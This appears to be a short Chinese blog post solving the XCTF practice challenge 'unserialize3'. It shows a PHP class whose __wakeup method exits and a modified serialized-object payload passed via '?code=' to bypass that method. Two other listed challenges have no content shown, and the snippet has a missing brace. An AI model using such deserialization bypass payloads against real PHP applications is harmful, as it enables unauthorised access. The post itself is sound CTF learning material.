今天又是去排练的一天,趁还没去做点题吧
目录
unserialize3
favorite_number
cat
unserialize3
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=好简单的一个反序列化,绕过wakeup就行了
poc:
php运行一下得到
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
为了绕过wakeup我们改成
O:5:"xctf":1:{s:4:"flag";s:3:"111";}最后
?code=O:5:"xctf":1:{s:4:"flag";s:3:"111";}
拿下,这个题一开始看那么简单就没仔细看,结果少了个花括号。就报错,,,,,
favorite_number附代码
关注
打赏
![]()
1652274937
查看更多评论
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
